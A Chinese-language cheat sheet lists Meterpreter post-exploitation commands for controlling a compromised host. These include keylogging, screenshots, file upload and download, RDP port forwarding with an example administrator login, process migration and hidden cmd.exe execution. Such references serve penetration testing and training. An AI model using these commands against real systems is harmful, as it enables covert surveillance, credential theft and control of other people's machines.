meterpreter常用命令

[meterpreter命令]

基本命令

background # 让meterpreter处于后台模式

sessions -i index # 与会话进行交互，index表示第一个session

quit # 退出会话

shell # 获得控制台权限

irb # 开启ruby终端

screenshot #屏幕截屏

keyscan_start #开始键盘记录

keyscan_dump #输出已获取的键盘记录

keyscan_stop #终止键盘记录

文件系统命令

cat # 查看文件内容

getwd # 查看当前工作目录

upload # 上传文件到目标机上

download # 下载文件到本机上

edit # 编辑文件

search # 搜索文件

网络命令

ipconfig / ifconfig # 查看网络接口信息

portfwd add -l 4444 -p 3389 -r 192.168.1.102 # 端口转发，本机监听4444，把目标机3389转到本机4444

rdesktop -u Administrator -p ichunqiu 127.0.0.1:4444 #然后使用rdesktop来连接，-u 用户名 -p 密码

route # 获取路由表信息

系统命令

ps # 查看当前活跃进程

migrate pid # 将Meterpreter会话移植到进程数位pid的进程中

execute -H -i -f cmd.exe # 创建新进程cmd.exe，-H不可见，-i交互

getpid # 获取当前进程的pid

kill pid # 杀死进程

getuid # 查看权限

sysinfo # 查看目标机系统信息，如机器名，操作系统等

shutdown # 关机